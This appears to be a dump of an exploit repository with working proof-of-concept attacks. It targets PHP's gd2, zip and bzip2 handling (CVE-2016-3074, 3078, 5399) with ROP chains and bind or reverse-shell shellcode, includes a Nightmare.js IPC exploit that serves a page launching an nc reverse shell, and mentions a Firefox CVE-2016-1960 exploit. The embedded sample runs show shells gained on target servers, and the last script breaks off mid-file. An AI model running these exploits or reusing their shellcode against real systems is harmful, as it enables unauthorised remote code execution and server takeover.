├── CVE-2016-3074
    ├── upload.php
    └── exploit.py
├── CVE-2020-24175
    ├── exploit.gif
    └── exploit.py
├── CVE-2016-1960
    ├── CVE-2016-1960.png
    ├── README.md
    └── CVE-2016-1960.html
├── CVE-2016-3078
    ├── upload.php
    └── exploit.py
├── nightmare-ipc
    ├── vuln.js
    └── exploit.py
└── CVE-2016-5399
    ├── upload.php
    └── exploit.py


/CVE-2016-3074/upload.php:
--------------------------------------------------------------------------------
1 | <?php
2 |     imagecreatefromgd2($_FILES["file"]["tmp_name"]);
3 | ?>
4 | 


--------------------------------------------------------------------------------
/CVE-2020-24175/exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/illikainen/exploits/HEAD/CVE-2020-24175/exploit.gif


--------------------------------------------------------------------------------
/CVE-2016-1960/CVE-2016-1960.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/illikainen/exploits/HEAD/CVE-2016-1960/CVE-2016-1960.png


--------------------------------------------------------------------------------
/CVE-2016-3078/upload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $zip = new ZipArchive();
 3 | if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) {
 4 |     echo "cannot open archive\n";
 5 | } else {
 6 |     for ($i = 0; $i < $zip->numFiles; $i++) {
 7 |         $data = $zip->getFromIndex($i);
 8 |     }
 9 |     $zip->close();
10 | }
11 | ?>
12 | 


--------------------------------------------------------------------------------
/nightmare-ipc/vuln.js:
--------------------------------------------------------------------------------
 1 | var Nightmare = require("nightmare");
 2 | 
 3 | if (process.argv.length !== 3) {
 4 |     console.error("usage:", process.argv[1], "url");
 5 |     process.exit(1);
 6 | }
 7 | 
 8 | new Nightmare()
 9 |     .goto(process.argv[2])
10 |     .end()
11 |     .catch (function (error) {
12 |         console.error(error);
13 |     });
14 | 


--------------------------------------------------------------------------------
/CVE-2016-5399/upload.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $fp = bzopen($_FILES["file"]["tmp_name"], "r");
 3 | if ($fp === FALSE) {
 4 |     exit("ERROR: bzopen()");
 5 | }
 6 | 
 7 | $data = "";
 8 | while (!feof($fp)) {
 9 |     $res = bzread($fp);
10 |     if ($res === FALSE) {
11 |         exit("ERROR: bzread()");
12 |     }
13 |     $data .= $res;
14 | }
15 | bzclose($fp);
16 | ?>
17 | 


--------------------------------------------------------------------------------
/CVE-2016-1960/README.md:
--------------------------------------------------------------------------------
 1 | ```javascript
 2 | /*
 3 |  * Exploit for CVE-2016-1960 [1] targeting Firefox 44.0.2 [2] on WoW64
 4 |  * with/without EMET 5.52.
 5 |  *
 6 |  * Tested on:
 7 |  * - 64bit Windows 10 Pro+Home (version 1703)
 8 |  * - 64bit Windows 7 Pro SP1
 9 |  *
10 |  * Vulnerability disclosed by ca0nguyen [1].
11 |  * Exploit written by Hans Jerry Illikainen <hji@dyntopia.com>.
12 |  *
13 |  * [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
14 |  * [2] https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/
15 |  */
16 | ```
17 | 
18 | ![screenshot](CVE-2016-1960.png)
19 | 


--------------------------------------------------------------------------------
/nightmare-ipc/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | #
  3 | # https://github.com/segmentio/nightmare/issues/1060
  4 | #
  5 | import sys
  6 | import os
  7 | import socket
  8 | import http.server
  9 | 
 10 | html = """
 11 | <!doctype html>
 12 | <html>
 13 |     <head>
 14 |         <meta charset="utf-8">
 15 |         <title>nightmarejs</title>
 16 |     </head>
 17 |     <body>
 18 |         <script>
 19 |             "use strict";
 20 | 
 21 |             function exec() {
 22 |                 try {
 23 |                     var sendSync = __nightmare.ipc.sendSync;
 24 |                     if (typeof sendSync !== "function") {
 25 |                         return;
 26 |                     }
 27 |                 } catch (e) {
 28 |                     return;
 29 |                 }
 30 | 
 31 |                 /*
 32 |                  * ELECTRON_BROWSER_REQUIRE returns metadata for
 33 |                  * module.exports, and the actual object is stored in
 34 |                  * the objectsRegistry (see valueToMeta())
 35 |                  */
 36 |                 var proc = sendSync("ELECTRON_BROWSER_REQUIRE", "child_process");
 37 | 
 38 |                 /*
 39 |                  * ELECTRON_BROWSER_MEMBER_CALL retrieves a module object from
 40 |                  * the objectsRegistry and calls the specified method with an
 41 |                  * array of arguments processed by unwrapArgs()
 42 |                  */
 43 |                 var port = location.port;
 44 |                 if (port === "") {
 45 |                     port = location.protocol === "http:" ? 80 : 443;
 46 |                 }
 47 |                 var host = location.hostname + " " + port;
 48 |                 var args = [{
 49 |                     type: "value",
 50 |                     value: "rm -f /tmp/fifo" +
 51 |                            "; mkfifo /tmp/fifo" +
 52 |                            "; cat /tmp/fifo" +
 53 |                            "| /bin/sh -i 2>&1" +
 54 |                            "| nc " + host + " >/tmp/fifo"
 55 |                 }];
 56 |                 sendSync("ELECTRON_BROWSER_MEMBER_CALL", proc.id, "exec", args);
 57 |             }
 58 | 
 59 |             exec();
 60 |         </script>
 61 |     </body>
 62 | </html>
 63 | """
 64 | 
 65 | 
 66 | class Server(http.server.HTTPServer):
 67 |     max_packet_size = 8192
 68 | 
 69 |     def finish_request(self, request, client_address):
 70 |         data = request.recv(self.max_packet_size, socket.MSG_PEEK)
 71 |         if len(data) > 0 and data[-1] == ord("\n"):
 72 |             self.RequestHandlerClass(request, client_address, self)
 73 |             return
 74 | 
 75 |         print("=> we may have a shell on %s" % request.getpeername()[0])
 76 |         if os.fork():
 77 |             while True:
 78 |                 cmd = sys.stdin.readline()
 79 |                 request.send(bytes(cmd, "utf-8"))
 80 |         else:
 81 |             while True:
 82 |                 res = request.recv(self.max_packet_size)
 83 |                 sys.stdout.write(str(res, "utf-8"))
 84 |                 sys.stdout.flush()
 85 | 
 86 | 
 87 | class HTTPRequestHandler(http.server.BaseHTTPRequestHandler):
 88 |     def do_GET(self):
 89 |         self.send_response(http.server.HTTPStatus.OK)
 90 |         self.send_header("Content-type", "text/html")
 91 |         self.send_header("Connection", "close")
 92 |         self.end_headers()
 93 |         self.wfile.write(bytes(html, "utf-8"))
 94 | 
 95 | 
 96 | def main():
 97 |     if len(sys.argv) != 2 or ":" not in sys.argv[1]:
 98 |         sys.exit("%s host:port" % sys.argv[0])
 99 | 
100 |     addr, port = sys.argv[1].split(":")
101 |     print("listening on %s:%s" % (addr, port))
102 |     server = Server((addr, int(port)), HTTPRequestHandler)
103 |     server.serve_forever()
104 | 
105 | 
106 | if __name__ == "__main__":
107 |     main()
108 | 


--------------------------------------------------------------------------------
/CVE-2016-5399/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #
  3 | # PoC for CVE-2016-5399 targeting FreeBSD 10.3 x86-64 running php-fpm
  4 | # behind nginx.
  5 | #
  6 | # ,----
  7 | # | $ nc -v -l 1.2.3.4 5555 &
  8 | # | Listening on [1.2.3.4] (family 0, port 5555)
  9 | # |
 10 | # | $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php
 11 | # | [*] sending archive to http://target/upload.php (0)
 12 | # |
 13 | # | Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479)
 14 | # | $ fg
 15 | # | id
 16 | # | uid=80(www) gid=80(www) groups=80(www)
 17 | # |
 18 | # | uname -imrsU
 19 | # | FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000
 20 | # |
 21 | # | /usr/sbin/pkg query -g "=> %n-%v" php*
 22 | # | => php70-7.0.8
 23 | # | => php70-bz2-7.0.8
 24 | # |
 25 | # | cat upload.php
 26 | # | <?php
 27 | # | $fp = bzopen($_FILES["file"]["tmp_name"], "r");
 28 | # | if ($fp === FALSE) {
 29 | # |     exit("ERROR: bzopen()");
 30 | # | }
 31 | # |
 32 | # | $data = "";
 33 | # | while (!feof($fp)) {
 34 | # |     $res = bzread($fp);
 35 | # |     if ($res === FALSE) {
 36 | # |         exit("ERROR: bzread()");
 37 | # |     }
 38 | # |     $data .= $res;
 39 | # | }
 40 | # | bzclose($fp);
 41 | # | ?>
 42 | # `----
 43 | #
 44 | # - Hans Jerry Illikainen <hji@dyntopia.com>
 45 | #
 46 | import argparse
 47 | import socket
 48 | from struct import pack
 49 | 
 50 | import requests
 51 | import bitstring
 52 | 
 53 | # reverse shell from metasploit
 54 | shellcode = [
 55 |     "\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f"
 56 |     "\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48\x31\xf6"
 57 |     "\x56\x48\xbe\x00\x02%(port)s%(ip)s\x56\x48\x89\xe6\x6a\x10"
 58 |     "\x5a\x0f\x05\x4c\x89\xe7\x6a\x03\x5e\x48\xff\xce\x6a\x5a\x58"
 59 |     "\x0f\x05\x75\xf6\x31\xc0\x83\xc0\x3b\xe8\x08\x00\x00\x00\x2f"
 60 |     "\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52"
 61 |     "\x57\x48\x89\xe6\x0f\x05"
 62 | ]
 63 | 
 64 | # we're bound by the MTF and can only reuse values on the stack
 65 | # between pos[0]..pos[255]
 66 | selectors = [
 67 |     # retaddr:
 68 |     #   0x8009c9462: lea    rsp,[rbp-0x20]
 69 |     #   0x8009c9466: pop    rbx
 70 |     #   0x8009c9467: pop    r12
 71 |     #   0x8009c9469: pop    r14
 72 |     #   0x8009c946b: pop    r15
 73 |     #   0x8009c946d: pop    rbp
 74 |     #   0x8009c946e: ret
 75 |     #
 76 |     # from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3)
 77 |     9, 10, 11, 18, 1, 88, 31, 127,
 78 | 
 79 |     # rbp:
 80 |     #   0x802974300 (close to the end of the stream)
 81 |     16, 17, 18, 29, 22, 152, 159, 25,
 82 | 
 83 |     # push it back
 84 |     17, 18, 19, 20, 21, 22, 23, 24,
 85 |     25, 26, 27, 28, 29, 30, 31, 32,
 86 |     33, 34, 35, 36, 37, 38, 39, 40,
 87 |     41, 42, 43, 44, 45, 46, 47, 48,
 88 |     49, 50, 51, 52, 53, 54, 55, 56,
 89 |     57, 58, 59, 60, 61, 62
 90 | ]
 91 | 
 92 | payload = [
 93 |     # addr
 94 |     #
 95 |     # 0x41c4c8: pop    rdi
 96 |     # 0x41c4c9: ret
 97 |     pack("<Q", 0x41c4c8),
 98 |     pack("<Q", 0x0802973000),
 99 | 
100 |     # len
101 |     #
102 |     # 0x421508: pop    rsi
103 |     # 0x421509: ret    0x0
104 |     pack("<Q", 0x421508),
105 |     pack("<Q", 0x5555),
106 | 
107 |     # prot
108 |     #
109 |     # 0x519b3a: pop    rdx
110 |     # 0x519b3b: ret
111 |     pack("<Q", 0x519b3a),
112 |     pack("<Q", 0x7),
113 | 
114 |     # mprotect
115 |     #
116 |     # 0x5adf50: pop    rax
117 |     # 0x5adf51: ret
118 |     pack("<Q", 0x5adf50),
119 |     pack("<Q", 74),
120 | 
121 |     # from /libexec/ld-elf.so.1 (bbdffba2dc3bb0b325c6eee9d6e5bd01141d97f3)
122 |     #
123 |     # 0x8009d5168: syscall
124 |     # 0x8009d516a: jb 0x8009d9d00
125 |     # 0x8009d5170: ret
126 |     pack("<Q", 0x08009d5168),
127 |     pack("<Q", 0x08029731b7),
128 | 
129 |     "%(shellcode)s",
130 | 
131 |     "%(pad)s",
132 | 
133 |     # 0x45de9c: pop rsp
134 |     # 0x45de9d: ret
135 |     pack("<Q", 0x45de9c),
136 |     pack("<Q", 0x0802973167),
137 | ]
138 | 
139 | 
140 | def get_payload(ip, port):
141 |     sc = "".join(shellcode) % {
142 |         "ip": socket.inet_aton(ip),
143 |         "port": pack("!H", port)
144 |     }
145 |     return "".join(payload) % {
146 |         "shellcode": sc,
147 |         "pad": "\x90" * (4433 - len(sc)),
148 |     }
149 | 
150 | 
151 | def get_header():
152 |     b = bitstring.BitArray()
153 |     b.append("0x425a")             # magic
154 |     b.append("0x68")               # huffman
155 |     b.append("0x31")               # block size (0x31 <= s <= 0x39)
156 |     b.append("0x314159265359")     # compressed magic
157 |     b.append("0x11223344")         # crc
158 |     b.append("0b0")                # not randomized
159 |     b.append("0x000000")           # pointer into BWT
160 |     b.append("0b0000000000000001") # mapping table 1
161 |     b.append("0b0000000000000001") # mapping table 2
162 |     b.append("0b110")              # number of Huffman groups (1 <= n <= 6)
163 |     b.append(format(len(selectors), "#017b")) # number of selectors
164 | 
165 |     # selector list
166 |     for s in selectors:
167 |         b.append("0b" + "1" * s + "0")
168 | 
169 |     # BZ_X_CODING_1 (1 <= n <= 20).  we want a fail to make
170 |     # BZ2_decompress() bail as early as possible into the
171 |     # first gadget since the stack will be kind of messed up
172 |     b.append("0b00000")
173 | 
174 |     return b.tobytes()
175 | 
176 | 
177 | def send_bzip2(url, bzip2):
178 |     try:
179 |         req = requests.post(url, files={"file": bzip2}, timeout=5)
180 |     except requests.exceptions.Timeout:
181 |         return 0
182 |     return req.status_code
183 | 
184 | 
185 | def get_args():
186 |     p = argparse.ArgumentParser()
187 |     p.add_argument("--ip", required=True, help="connect-back ip")
188 |     p.add_argument("--port", required=True, type=int, help="connect-back port")
189 |     p.add_argument("--attempts", type=int, default=10)
190 |     p.add_argument("url")
191 |     return p.parse_args()
192 | 
193 | 
194 | def main():
195 |     args = get_args()
196 |     bzip2 = get_header() + get_payload(args.ip, args.port)
197 | 
198 |     for i in range(args.attempts):
199 |         print("[*] sending archive to %s (%d)" % (args.url, i))
200 |         status = send_bzip2(args.url, bzip2)
201 |         if status == 0:
202 |             break
203 |         elif status == 404:
204 |             exit("[-] 404: %s" % args.url)
205 | 
206 | if __name__ == "__main__":
207 |     main()
208 | 


--------------------------------------------------------------------------------
/CVE-2016-3074/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | #
  3 | # PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and
  4 | # php5-fpm running behind nginx.
  5 | #
  6 | # ,----
  7 | # | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
  8 | # | [*] this may take a while
  9 | # | [*] offset 912 of 10000...
 10 | # | [+] connected to 1.2.3.4:5555
 11 | # | id
 12 | # | uid=33(www-data) gid=33(www-data) groups=33(www-data)
 13 | # |
 14 | # | uname -a
 15 | # | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
 16 | # | 2016 x86_64 x86_64 x86_64 GNU/Linux
 17 | # |
 18 | # | dpkg -l|grep -E "php5-(fpm|gd)"
 19 | # | ii  php5-fpm       5.6.11+dfsg-1ubuntu3.1 ...
 20 | # | ii  php5-gd        5.6.11+dfsg-1ubuntu3.1 ...
 21 | # |
 22 | # | cat upload.php
 23 | # | <?php
 24 | # |     imagecreatefromgd2($_FILES["file"]["tmp_name"]);
 25 | # | ?>
 26 | # `----
 27 | #
 28 | # - Hans Jerry Illikainen
 29 | #
 30 | import sys
 31 | import os
 32 | import zlib
 33 | import socket
 34 | import threading
 35 | import argparse
 36 | import urlparse
 37 | from struct import pack
 38 | 
 39 | import requests
 40 | 
 41 | # non-optimized bindshell from binjitsu
 42 | #
 43 | # context(arch="amd64", os="linux")
 44 | # asm(shellcraft.bindsh(port, "ipv4"))
 45 | shellcode = [
 46 |     "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x52\xba",
 47 |     "%(fam-and-port)s\x52\x6a\x10\x5a\x48\x89\xc5\x48\x89\xc7",
 48 |     "\x6a\x31\x58\x48\x89\xe6\x0f\x05\x6a\x32\x58\x48\x89\xef",
 49 |     "\x6a\x01\x5e\x0f\x05\x6a\x2b\x58\x48\x89\xef\x31\xf6\x99",
 50 |     "\x0f\x05\x48\x89\xc5\x6a\x03\x5e\x48\xff\xce\x78\x0b\x56",
 51 |     "\x6a\x21\x58\x48\x89\xef\x0f\x05\xeb\xef\x6a\x68\x48\xb8",
 52 |     "\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x6a\x3b\x58\x48\x89",
 53 |     "\xe7\x31\xf6\x99\x0f\x05"
 54 | ]
 55 | 
 56 | gadgets = [
 57 |     "\x90" * 40,
 58 | 
 59 |     # [16]
 60 |     #
 61 |     # 0xb6eca2:  popfq
 62 |     # 0xb6eca3:  callq  *%rsp
 63 |     pack("<Q", 0xb6eca2),
 64 | 
 65 |     "%(pad)s",
 66 | 
 67 |     # [2]
 68 |     #
 69 |     # 0x4dbe8c:  add  $0xd8,%rsp
 70 |     # 0x4dbe93:  retq
 71 |     pack("<Q", 0x4dbe8c),
 72 | 
 73 |     "\x90" * 48,
 74 | 
 75 |     # [1]
 76 |     #
 77 |     # (gdb) x/x {void *}($rsp + 8)
 78 |     # 0x12d7d60:  0x9090909090909090
 79 |     #
 80 |     # 0xa91f35:  rex.WXB  pop %r14
 81 |     # 0xa91f37:  mov      $0x3,%bh
 82 |     # 0xa91f39:  pop      %rsp
 83 |     # 0xa91f3a:  retq
 84 |     pack("<Q", 0xa91f35),
 85 | 
 86 |     "\x90" * 152,
 87 | 
 88 |     # [0]
 89 |     #
 90 |     # (gdb) x/i $rip
 91 |     # => 0x7f91acf61f46:  callq  *0x70(%rax)
 92 |     #
 93 |     # (gdb) x/gx 0x432b80
 94 |     # 0x432b80:  0x0000000000547880
 95 |     #
 96 |     # (gdb) x/3i 0x0000000000547880
 97 |     # 0x547880:  push   %rbx
 98 |     # 0x547881:  mov    %rdi,%rbx
 99 |     # 0x547884:  callq  *0x20(%rdi)
100 |     pack("<Q", 0x432b80 - 0x70),
101 | 
102 |     # [3]
103 |     #
104 |     # 0x463e2c:  pop  %rbx
105 |     # 0x463e2d:  retq
106 |     pack("<Q", 0x463e2c),
107 | 
108 |     # [7]
109 |     #
110 |     # 0x463b1d:  pop  %r12
111 |     # 0x463b1f:  retq
112 |     pack("<Q", 0x463b1d),
113 | 
114 |     # [4]
115 |     #
116 |     # 0x473053:  pop  %rax
117 |     # 0x473054:  retq
118 |     pack("<Q", 0x473053),
119 | 
120 |     # [6]
121 |     #
122 |     # 0xa8bc37:  push  %rdx
123 |     # 0xa8bc38:  jmpq  *%rbx
124 |     pack("<Q", 0xa8bc37),
125 | 
126 |     # [5]
127 |     #
128 |     # 0x7b2eaf:  mov   %r9,%rdx
129 |     # 0x7b2eb2:  jmpq  *%rax
130 |     pack("<Q", 0x7b2eaf),
131 | 
132 |     # [8]
133 |     #
134 |     # 0x552768:  mov  %rdi,%rax
135 |     # 0x55276b:  retq
136 |     pack("<Q", 0x552768),
137 | 
138 |     # [9]
139 |     #
140 |     # 0x463e2c:  pop  %rbx
141 |     # 0x463e2d:  retq
142 |     pack("<Q", 0x463e2c),
143 |     pack("<Q", 0xfffff000),
144 | 
145 |     # [10]
146 |     #
147 |     # 0xb6c734:  and  %ebx,%eax
148 |     # 0xb6c736:  es retq
149 |     pack("<Q", 0xb6c734),
150 | 
151 |     # [11]
152 |     #
153 |     # 0x4c93e9:  xchg  %eax,%ebx
154 |     # 0x4c93ea:  retq
155 |     pack("<Q", 0x4c93e9),
156 | 
157 |     # [12]
158 |     #
159 |     # 0x406a08:  pop  %rcx (len, 0x5555)
160 |     # 0x406a09:  retq
161 |     pack("<Q", 0x406a08),
162 |     pack("<Q", 0x5555),
163 | 
164 |     # [13]
165 |     #
166 |     # 0xaf58fd:  pop  %rdx (PROT_READ|PROT_WRITE|PROT_EXEC)
167 |     # 0xaf58fe:  retq
168 |     pack("<Q", 0xaf58fd),
169 |     pack("<Q", 7),
170 | 
171 |     # [14]
172 |     #
173 |     # 0x473053:  pop  %rax (mprotect)
174 |     # 0x473054:  retq
175 |     pack("<Q", 0x473053),
176 |     pack("<Q", 125),
177 | 
178 |     # [15]
179 |     #
180 |     # 0x53f9f8:  int    $0x80
181 |     # 0x53f9fa:  mov    0x38(%r12),%rsi
182 |     # 0x53f9ff:  mov    $0x8f,%edi
183 |     # 0x53fa04:  callq  *0x28(%r12)
184 |     pack("<Q", 0x53f9f8),
185 | 
186 |     "\x90" * 100,
187 | ]
188 | 
189 | # gd.h: #define gdMaxColors 256
190 | gd_max_colors = 256
191 | 
192 | 
193 | def make_gd2(chunks):
194 |     gd2 = [
195 |         "gd2\x00",                    # signature
196 |         pack(">H", 2),                # version
197 |         pack(">H", 1),                # image size (x)
198 |         pack(">H", 1),                # image size (y)
199 |         pack(">H", 0x40),             # chunk size (0x40 <= cs <= 0x80)
200 |         pack(">H", 2),                # format (GD2_FMT_COMPRESSED)
201 |         pack(">H", 1),                # num of chunks wide
202 |         pack(">H", len(chunks))       # num of chunks high
203 |     ]
204 |     colors = [
205 |         pack(">B", 0),                # trueColorFlag
206 |         pack(">H", 0),                # im->colorsTotal
207 |         pack(">I", 0),                # im->transparent
208 |         pack(">I", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i]
209 |     ]
210 | 
211 |     offset = len("".join(gd2)) + len("".join(colors)) + len(chunks) * 8
212 |     for data, size in chunks:
213 |         gd2.append(pack(">I", offset)) # cidx[i].offset
214 |         gd2.append(pack(">I", size))   # cidx[i].size
215 |         offset += size
216 | 
217 |     return "".join(gd2 + colors + [data for data, size in chunks])
218 | 
219 | 
220 | def connect(host, port):
221 |     addr = socket.gethostbyname(host)
222 |     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
223 |     try:
224 |         sock.connect((addr, port))
225 |     except socket.error:
226 |         return
227 | 
228 |     print("\n[+] connected to %s:%d" % (host, port))
229 |     if os.fork() == 0:
230 |         while True:
231 |             try:
232 |                 data = sock.recv(8192)
233 |             except KeyboardInterrupt:
234 |                 sys.exit("\n[!] receiver aborting")
235 |             if data == "":
236 |                 sys.exit("[!] receiver aborting")
237 |             sys.stdout.write(data)
238 |     else:
239 |         while True:
240 |             try:
241 |                 cmd = sys.stdin.readline()
242 |             except KeyboardInterrupt:
243 |                 sock.close()
244 |                 sys.exit("[!] sender aborting")
245 |             sock.send(cmd)
246 | 
247 | 
248 | def send_gd2(url, gd2, code):
249 |     files = {"file": gd2}
250 |     try:
251 |         req = requests.post(url, files=files, timeout=5)
252 |         code.append(req.status_code)
253 |     except requests.exceptions.ReadTimeout:
254 |         pass
255 | 
256 | 
257 | def get_payload(offset, port):
258 |     rop = "".join(gadgets) % {"pad": "\x90" * offset}
259 | 
260 |     fam_and_port = pack("<I", (socket.AF_INET | (socket.htons(port) << 16)))
261 |     sc = "".join(shellcode) % {"fam-and-port": fam_and_port}
262 | 
263 |     return rop + sc
264 | 
265 | 
266 | def get_args():
267 |     p = argparse.ArgumentParser()
268 |     p.add_argument("--threads", type=int, default=20)
269 |     p.add_argument("--bind-port", type=int, default=8000)
270 |     p.add_argument("--offsets", type=int, default=[0, 10000], nargs=2)
271 |     p.add_argument("url")
272 |     return p.parse_args()
273 | 
274 | 
275 | def main():
276 |     args = get_args()
277 |     host = urlparse.urlparse(args.url).netloc.split(":")[0]
278 | 
279 |     print("[*] this may take a while")
280 |     for i in range(args.offsets[0], args.offsets[1]):
281 |         sys.stdout.write("\r[*] offset %d of %d..." % (i, args.offsets[1]))
282 |         sys.stdout.flush()
283 | 
284 |         valid = zlib.compress("A" * 100, 0)
285 |         payload = get_payload(i, args.bind_port)
286 |         gd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)])
287 | 
288 |         threads = []
289 |         code = []
290 |         for _ in range(args.threads):
291 |             t = threading.Thread(target=send_gd2, args=(args.url, gd2, code))
292 |             t.start()
293 |             threads.append(t)
294 | 
295 |         for t in threads:
296 |             t.join()
297 | 
298 |         if 404 in code:
299 |             sys.exit("\n[-] 404: %s" % args.url)
300 |         connect(host, args.bind_port)
301 | 
302 |     print("\n[-] nope...")
303 | 
304 | if __name__ == "__main__":
305 |     main()
306 | 


--------------------------------------------------------------------------------
/CVE-2016-3078/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | #
  3 | # PoC for CVE-2016-3078 targeting Arch Linux i686 running php-fpm 7.0.5
  4 | # behind nginx.
  5 | #
  6 | # ,----
  7 | # | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
  8 | # | [*] this may take a while
  9 | # | [*] 103 of 4096 (0x67fd0)...
 10 | # | [+] connected to 1.2.3.4:5555
 11 | # |
 12 | # | id
 13 | # | uid=33(http) gid=33(http) groups=33(http)
 14 | # |
 15 | # | uname -a
 16 | # | Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST
 17 | # | 2016 i686 GNU/Linux
 18 | # |
 19 | # | pacman -Qs php-fpm
 20 | # | local/php-fpm 7.0.5-2
 21 | # |     FastCGI Process Manager for PHP
 22 | # |
 23 | # | cat upload.php
 24 | # | <?php
 25 | # | $zip = new ZipArchive();
 26 | # | if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) {
 27 | # |     echo "cannot open archive\n";
 28 | # | } else {
 29 | # |     for ($i = 0; $i < $zip->numFiles; $i++) {
 30 | # |         $data = $zip->getFromIndex($i);
 31 | # |     }
 32 | # |     $zip->close();
 33 | # | }
 34 | # | ?>
 35 | # `----
 36 | #
 37 | # - Hans Jerry Illikainen
 38 | #
 39 | import os
 40 | import sys
 41 | import argparse
 42 | import socket
 43 | import urlparse
 44 | import collections
 45 | from struct import pack
 46 | from binascii import crc32
 47 | 
 48 | import requests
 49 | 
 50 | # bindshell from PEDA
 51 | shellcode = [
 52 |     "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
 53 |     "\x43\x52\x66\x68%(port)s\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
 54 |     "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
 55 |     "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
 56 |     "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
 57 |     "\x89\xe1\xcd\x80"
 58 | ]
 59 | 
 60 | # 100k runs had the zend_mm_heap mapped at 0xb6a00040 ~53.333% and at
 61 | # 0xb6c00040 ~46.667% of the time.
 62 | zend_mm_heap = [0xb6a00040, 0xb6c00040]
 63 | 
 64 | # offset to the payload from the zend heap
 65 | zend_mm_heap_offset = "0x%xfd0"
 66 | 
 67 | # Zend/zend_alloc_sizes.h
 68 | zend_mm_max_small_size = 3072
 69 | 
 70 | # exit()
 71 | R_386_JUMP_SLOT = 0x08960a48
 72 | 
 73 | ZipEntry = collections.namedtuple("ZipEntry", "name, data, size")
 74 | 
 75 | 
 76 | def zip_file_header(fname, data, size):
 77 |     return "".join([
 78 |         pack("<I", 0x04034b50),               # signature
 79 |         pack("<H", 0x0),                      # minimum version
 80 |         pack("<H", 0x0),                      # general purpose bit flag
 81 |         pack("<H", 0x0),                      # compression method
 82 |         pack("<H", 0),                        # last modification time
 83 |         pack("<H", 0),                        # last modification date
 84 |         pack("<I", crc32(data) & 0xffffffff), # crc-32
 85 |         pack("<I", len(data)),                # compressed size
 86 |         pack("<I", size),                     # uncompressed size
 87 |         pack("<H", len(fname)),               # filename length
 88 |         pack("<H", 0x0),                      # extra field length
 89 |         fname,                                # filename
 90 |         "",                                   # extra
 91 |         data                                  # compressed data
 92 |     ])
 93 | 
 94 | 
 95 | def zip_central_dir(offset, fname, data, size):
 96 |     return "".join([
 97 |         pack("<I", 0x02014b50),               # signature
 98 |         pack("<H", 0x0),                      # archive created with version
 99 |         pack("<H", 0x0),                      # archive requires version
100 |         pack("<H", 0x0),                      # general purpose bit flag
101 |         pack("<H", 0x0),                      # compression method
102 |         pack("<H", 0),                        # last modification time
103 |         pack("<H", 0),                        # last modification date
104 |         pack("<I", crc32(data) & 0xffffffff), # crc-32
105 |         pack("<I", len(data)),                # compressed size
106 |         pack("<I", size),                     # uncompressed size
107 |         pack("<H", len(fname)),               # filename length
108 |         pack("<H", 0x0),                      # extra field length
109 |         pack("<H", 0x0),                      # comment length
110 |         pack("<H", 0x0),                      # disk number
111 |         pack("<H", 0x0),                      # internal file attributes
112 |         pack("<I", 0x0),                      # external file attributes
113 |         pack("<I", offset),                   # offset of file header
114 |         fname,                                # filename
115 |         "",                                   # extra
116 |         "",                                   # comment
117 |     ])
118 | 
119 | 
120 | def zip_central_dir_end(num, size, offset):
121 |     return "".join([
122 |         pack("<I", 0x06054b50), # signature
123 |         pack("<H", 0x0),        # disk number
124 |         pack("<H", 0x0),        # disk where central directory starts
125 |         pack("<H", num),        # number of central directories on this disk
126 |         pack("<H", num),        # total number of central directory records
127 |         pack("<I", size),       # size of central directory
128 |         pack("<I", offset),     # offset of central directory
129 |         pack("<H", 0x0),        # comment length
130 |         ""                      # comment
131 |     ])
132 | 
133 | 
134 | def zip_entries(addr, shellcode):
135 |     if len(shellcode) > zend_mm_max_small_size:
136 |         sys.exit("[-] shellcode is too big")
137 | 
138 |     size = 0xfffffffe
139 |     length = 256
140 |     entries = [ZipEntry("shellcode", shellcode, zend_mm_max_small_size)]
141 |     for i in range(16):
142 |         data = "A" * length
143 |         if i == 0:
144 |             data = pack("<I", (R_386_JUMP_SLOT - 0x10)) * (length / 4)
145 |         elif i == 3:
146 |             data = pack("<I", addr) + data[4:]
147 |         entries.append(ZipEntry("overflow", data, size))
148 |     return entries
149 | 
150 | 
151 | def zip_create(entries):
152 |     archive = []
153 |     directories = []
154 |     offset = 0
155 |     for e in entries:
156 |         file_header = zip_file_header(e.name, e.data, e.size)
157 |         directories.append((e, offset))
158 |         offset += len(file_header)
159 |         archive.append(file_header)
160 | 
